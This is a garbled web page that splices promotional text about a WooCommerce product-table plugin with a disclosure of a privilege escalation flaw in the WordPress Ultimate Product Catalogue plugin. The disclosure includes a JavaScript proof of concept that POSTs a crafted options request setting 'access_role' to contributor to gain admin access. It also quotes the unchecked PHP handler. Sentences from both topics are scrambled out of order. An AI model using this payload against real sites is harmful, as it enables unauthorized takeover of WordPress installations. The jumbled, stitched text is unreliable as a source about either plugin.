Looking for a suitable WooCommerce plugin can be quite confusing! The term ‘product catalog’ is often used to mean different things. In this post, I’ll walk you through how to do this using the new WooCommerce Product Table plugin, which was released last week. Note: The vulnerability can be exploited if the plugin is in full version.Īn attacker without any account, but the administration menu item only appear when the attackerĪccount is contributor, editor or author.Until now, there was no easy way to create a WooCommerce product catalog to list products in a neat and compact format. The function does not check for capabilities… $update = _(“Options have been succesfully updated.”, ‘UPCP’) If ($Full_Version = “Yes” and isset($_POST)) $InstallVersion = get_option(“UPCP_First_Install_Version”) Located in /Functions/Update_Admin-Databases.php` file +”&pretty_links=No&xml_sitemap_url=&seo_option=None&seo_integration=Add&seo_title=%5Bpage-title%5D+%7C+%5Bproduct-name%5D&categories_label=&subcategories_label=&tags_label=&custom_fields_label=&sort_by_label=&price_ascending_label=&price_descending_label=&name_ascending_label=&name_descending_label=&product_name_search_label=&product_name_text_label=&details_label=&back_to_catalogue=&no_results_found_label=&products_pagination_label=&product_details_label=&additional_info_label=&contact_us_label=&related_products_label=&next_product_label=&previous_product_label=&Options_Submit=Save+Changes” Var body = “color_scheme=Blue&product_links=Same&read_more=Yes&desc_count=240&sidebar_order=Normal&Details_Image=http%3A%2F%2F&filter_type=AJAX&case_insensitive_search=Yes&tag_logic=AND&product_search=name&contents_filter=Yes&maintain_filtering=Yes&Socialmedia%5B%5D=Blank&custom_product_page=No&product_inquiry_form=No&product_reviews=No&lightbox=No&products_per_page=1000000&pagination_location=Top&product_sort=Price_Name&cf_converion=No&access_role=”+access_role Xhr.setRequestHeader(“Accept-Language”, “es-ES,es q=0.8”) Xhr.setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded”) Xhr.setRequestHeader(“Accept”, “text/html,application/xhtml+xml,application/xml q=0.9,image/webp,*/* q=0.8”) Var access_role = “contributor” //this is my type of profile (contributor|editor|author) to full admin acces!!
Remote attackers are able to request crafted data of the POST method request with the vulnerable ´ acces_role´ parameter.Įxploitation of the privilege scalation vulnerability requires low user interaction and low privilege web-application user account, and successful exploitation of the privilege scalation vulnerability results in web aplication compromise.įor demostration I have done a proof of concept to show the vulnerability logged in as a contributor user. Recently, I found a privilege escalation vulnerability in the WordPress Ultimate Product Catalogue Plugin /Functions/Update_Admin-Databases.php` file.
0 kommentar(er)
